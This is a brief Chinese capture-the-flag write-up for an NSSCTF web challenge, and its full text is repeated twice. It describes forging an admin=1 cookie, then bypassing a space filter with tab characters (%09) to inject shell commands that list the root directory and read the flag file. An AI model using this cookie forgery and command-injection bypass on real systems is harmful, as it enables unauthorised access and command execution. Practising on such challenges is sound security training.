https://www.nssctf.cn/problem/425
cookie修改 rce 空格绕过
进入题目可以把看到代码
将cookie设置为 admin=1 即可得到rasalghul.php访问阅读代码
代码只使用了preg_match("/ /", $ip)做了空格过滤可以使用%09(tab)来绕过,payload
?url=ls%09/
?url=cat%09/flllllaaaaaaggggggg
https://www.nssctf.cn/problem/425
cookie修改 rce 空格绕过
进入题目可以把看到代码
将cookie设置为 admin=1 即可得到rasalghul.php访问阅读代码
代码只使用了preg_match("/ /", $ip)做了空格过滤可以使用%09(tab)来绕过,payload
?url=ls%09/
?url=cat%09/flllllaaaaaaggggggg